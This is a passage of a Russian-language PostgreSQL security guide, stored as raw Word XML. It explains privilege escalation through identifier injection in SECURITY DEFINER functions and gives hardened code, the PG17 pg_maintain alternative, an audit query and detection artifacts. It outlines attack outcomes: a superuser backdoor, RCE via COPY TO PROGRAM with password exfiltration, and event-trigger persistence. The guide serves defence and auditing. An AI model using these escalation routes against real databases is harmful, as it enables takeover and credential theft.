          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A68861" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 3. Verify table exists в этой схеме</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCAA799" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    PERFORM 1 FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C7D2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    JOIN pg_namespace n ON c.relnamespace = n.oid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AAE864" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE n.nspname = tenant_schema AND c.relname = target_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1EAEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND c.relkind = 'r';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBE01C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF NOT FOUND THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7356257F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'table %.% does not exist', tenant_schema, target_table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE977FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD12AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB27B05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 4. Identifier через %I, никаких concat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D265889" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('ANALYZE %I.%I', tenant_schema, target_table);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F8B5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('REINDEX TABLE %I.%I', tenant_schema, target_table);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32318C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA39BA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B964C2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Защита-уровней четыре:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF52845" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path = pg_catalog, pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — закрывает 3.13.6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16DBAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Whitelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через query к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (живой список schemas, не hardcoded array — масштабируется автоматически).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F631F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. ASCII-regex для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>target_table</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6F04B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для identifier в EXECUTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9D7638" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Все четыре независимы — single failure не открывает уязвимость.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CCF751" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Альтернатива — переход на PG 17 `pg_maintain` role</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3038C860" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В PostgreSQL 17 (релиз 26.09.2024) появилась predefined role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> privilege на таблицу. Это позволяет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>избавиться от SECURITY DEFINER функции вообще</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6BDEB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- PG 17+ pattern: явный GRANT MAINTAIN, без SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C1C7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT MAINTAIN ON ALL TABLES IN SCHEMA tenant_42 TO application_admin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EE244E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Теперь application_admin может ANALYZE / REINDEX / VACUUM / CLUSTER напрямую</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F39B06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>снимает целую категорию атак на SECURITY DEFINER функции для maintenance tasks</w:t>
      </w:r>
      <w:r>
        <w:t>. Для PG ≤ 16 — приходится использовать SECURITY DEFINER + защиту выше.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F3B74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Variant A — создание persistent superuser backdoor. Variant B — RCE как ОС-пользователь postgres + exfiltration всех паролей. Variant C — persistent backdoor через event trigger. Все три — full DBA compromise from application-admin-level account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE897CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591451F6"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внутри EXECUTE plpgsql-функции — DDL (DROP USER, CREATE USER), CREATE EVENT TRIGGER, COPY TO PROGRAM. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Эти statements от caller `application_admin`, но фактически выполнены под postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это критичный mismatch в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usename</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9936EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>: появление новых ролей (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attacker SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t>) — direct audit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD7698" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_event_trigger</w:t>
      </w:r>
      <w:r>
        <w:t>: новые triggers, owner = postgres, created от non-DBA session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B8428" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = all</w:t>
      </w:r>
      <w:r>
        <w:t>: full SQL trace; backdoor-statements видны полностью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9AB53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   OS-logs: подозрительные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-процессы под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>-user (Variant B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E8338" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Каскад трёх ошибок</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059CBCC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECURITY DEFINER переключает current_user на owner</w:t>
      </w:r>
      <w:r>
        <w:t>. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t>): *"SECURITY DEFINER specifies that the function is to be executed with the privileges of the user that owns it."* Это design-feature для делегирования прав.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690227E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dynamic SQL EXECUTE внутри SD-функции наследует SECURITY DEFINER context</w:t>
      </w:r>
      <w:r>
        <w:t>. Это документировано в plpgsql section: *"The string is parsed and executed as if it were entered as a SQL statement at the SQL-language level."* Поскольку we в SD-context, statement исполняется под owner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1C96C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identifier-injection пропускает arbitrary SQL в EXECUTE-string</w:t>
      </w:r>
      <w:r>
        <w:t>. См. 3.16.1–3.16.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58FB6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сочетание — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary SQL под owner-привилегиями</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это не разные баги, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>это один class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — «privilege escalation через mis-coded SD-функцию», и identifier-injection — самый частый способ его триггера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B200C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Минимальный case: SD-функция с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>одним</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-concat identifier — достаточно. Защита требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>systematic audit всех SD-функций</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED4A204" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Audit-query для всех SD-функций в БД, ищем dynamic SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58577C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT n.nspname, p.proname, p.prosrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20F654" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1196DCE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_namespace n ON n.oid = p.pronamespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A4F1A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D7001D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND p.prosrc ~ '\bEXECUTE\b'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C22B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
